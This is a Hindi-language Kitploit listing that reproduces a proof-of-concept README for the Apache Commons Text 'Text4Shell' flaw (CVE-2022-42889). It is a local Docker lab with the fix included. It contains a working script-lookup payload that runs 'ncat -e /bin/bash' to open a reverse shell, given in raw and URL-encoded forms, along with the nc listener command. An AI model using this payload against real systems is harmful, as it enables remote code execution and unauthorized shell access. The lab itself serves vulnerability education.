Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2022-42889-POC — एक सरल डॉकराइज़्ड एप्लिकेशन जो दिखाता है कि CVE-2022-42889 भेद्यता का शोषण कैसे करें। | Kitploit
उपकरण/GitHubGitHub/akshayithape-devops/cve-2022-42889-poc
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणलर्निंग और शिक्षापेलोड डेवलपमेंटलैब और अभ्यास
GitHubakshayithape-devops/cve-2022-42889-poc

CVE-2022-42889-POC

एक सरल डॉकराइज़्ड एप्लिकेशन जो दिखाता है कि CVE-2022-42889 भेद्यता का शोषण कैसे करें।

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
रिपॉजिटरी देखें
513 साल पहलेअभी तक समीक्षित नहीं

CVE-2022-42889-POC

Apache commons-text भेद्यता CVE-2022-42889 के लिए प्रूफ ऑफ कॉन्सेप्ट।

समस्या क्या है :

Apache Commons Text चर इंटरपोलेशन करता है, जिससे प्रॉपर्टीज को गतिशील रूप से मूल्यांकित और विस्तारित किया जा सकता है। इंटरपोलेशन का मानक प्रारूप "${prefix:name}" है, जहाँ "prefix" का उपयोग org.apache.commons.text.lookup.StringLookup के एक उदाहरण का पता लगाने के लिए किया जाता है जो इंटरपोलेशन करता है। संस्करण 1.5 से शुरू होकर 1.9 तक, डिफ़ॉल्ट Lookup इंस्टेंस के सेट में ऐसे इंटरपोलेटर शामिल थे जो मनमाने कोड निष्पादन या दूरस्थ सर्वरों से संपर्क का कारण बन सकते थे। These lookups are: - "script" - JVM स्क्रिप्ट निष्पादन इंजन (javax.script) का उपयोग करके एक्सप्रेशन निष्पादित करें - "dns" - dns रिकॉर्ड हल करें - "url" - urls से मान लोड करें, जिसमें दूरस्थ सर्वर भी शामिल हैं। प्रभावित संस्करणों में इंटरपोलेशन डिफ़ॉल्ट का उपयोग करने वाले एप्लिकेशन अविश्वसनीय कॉन्फ़िगरेशन मानों का उपयोग करने पर दूरस्थ कोड निष्पादन या दूरस्थ सर्वरों के साथ अनजाने संपर्क के प्रति संवेदनशील हो सकते हैं।

प्रभावित संस्करण :

Apache Commons Text संस्करण 1.5 से 1.9

CVE-2022-42889-POC भेद्यता दिखाने के लिए चरण-दर-चरण मार्गदर्शिका :

1. Docker का उपयोग करके एप्लिकेशन बनाएं (टर्मिनल टैब 1)

root@kitploit:~
docker build --tag=test/text4shell .

2. एप्लिकेशन चलाएं (टर्मिनल टैब 2)

root@kitploit:~
docker run -it -p 80:8080 --name text4shell test/text4shell

3. नया टर्मिनल टैब खोलें और नीचे दिया गया कमांड चलाएं (टर्मिनल टैब 3)

root@kitploit:~
docker exec -it text4shell /bin/bash

4. अब आपके स्थानीय सिस्टम पर रिवर्स शेल के लिए लिसनर शुरू करने का समय है (टर्मिनल टैब 4)

root@kitploit:~
nc -nlvp 8888

5. ऐप का परीक्षण करें (टर्मिनल टैब 5)

root@kitploit:~
curl http://localhost/text4shell/attack?search=<anything>

6. अब हमले का परीक्षण करने का समय है (टर्मिनल टैब 5)

हमला एक स्ट्रिंग "${prefix:name}" पास करके किया जा सकता है जहाँ prefix उपर्युक्त lookup है: ${script:javascript:java.lang.Runtime.getRuntime().exec('ncat -e /bin/bash 172.17.0.1 8888')}

root@kitploit:~
curl http://localhost/text4shell/attack?search=%24%7Bscript%3Ajavascript%3Ajava.lang.Runtime.getRuntime%28%29.exec%28%27ncat%20-e%20%2Fbin%2Fbash%20172.17.0.1%208888%27%29%7D

7. अब टर्मिनल टैब 3 पर जाएं और नीचे दिए गए कमांड्स को एक-एक करके निष्पादित करें

root@kitploit:~
pwd
cd /root
pwd
ls

8. अब टर्मिनल टैब 5 पर जाएं और नीचे दिए गए कमांड्स को एक-एक करके निष्पादित करें

root@kitploit:~
pwd
cd /root
pwd
ls
touch hacked.txt
ls

9. अब टर्मिनल टैब 3 पर जाएं और नीचे दिए गए कमांड्स को एक-एक करके निष्पादित करें

root@kitploit:~
pwd
ls

यदि आप ls कमांड के बाद टर्मिनल टैब 3 पर hacked.txt फ़ाइल देख पाते हैं, तो हमला निष्पादित हो गया है।

10. सभी टर्मिनल बंद करें

इस भेद्यता को कैसे ठीक करें :

उपयोगकर्ताओं को Apache Commons Text 1.10.0 में अपग्रेड करने की अनुशंसा की जाती है, जो डिफ़ॉल्ट रूप से समस्याग्रस्त इंटरपोलेटर को अक्षम कर देता है।

अधिक जानकारी :

  • NVD-NIST
टूल डाउनलोड करें